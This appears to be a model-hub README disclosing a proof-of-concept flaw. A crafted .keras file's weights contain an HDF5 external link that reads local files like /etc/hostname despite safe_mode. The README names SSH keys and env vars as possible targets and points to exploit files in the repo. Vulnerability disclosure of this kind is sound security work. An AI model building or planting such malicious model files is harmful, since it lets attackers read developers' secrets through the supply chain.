This repo is a proof of concept for a vulnerability I found in how the modern .keras format handles weights. Even if you use safe_mode=True, the model loader still messes up by letting the HDF5 driver resolve external links. This means a malicious model can "point" to files on your local system (like /etc/hostname) and read them into the model session.
Setup
The exploit_model.keras file is actually a zip. Inside, the model.weights.h5 has been modified to include an HDF5 external link. When Keras loads the weights, it follows that link to the host's local files. It bypasses the Python-level safety checks because the "leak" happens deeper down in the H5 library.
Procedure
- Grab the code3,py file from this repo.
- After that run the tcn2.py or similar trigger adjusted to your setup / testcase from this same repo
Impact
This is a pretty big deal for supply-chain security. If a dev downloads a "pre-trained" model, that model could theoretically peek at their env vars, config files, or SSH keys just by being initialized. It totally breaks the trust people have in the new .keras format.
Check the exploit_model.keras file
- Downloads last month
- -

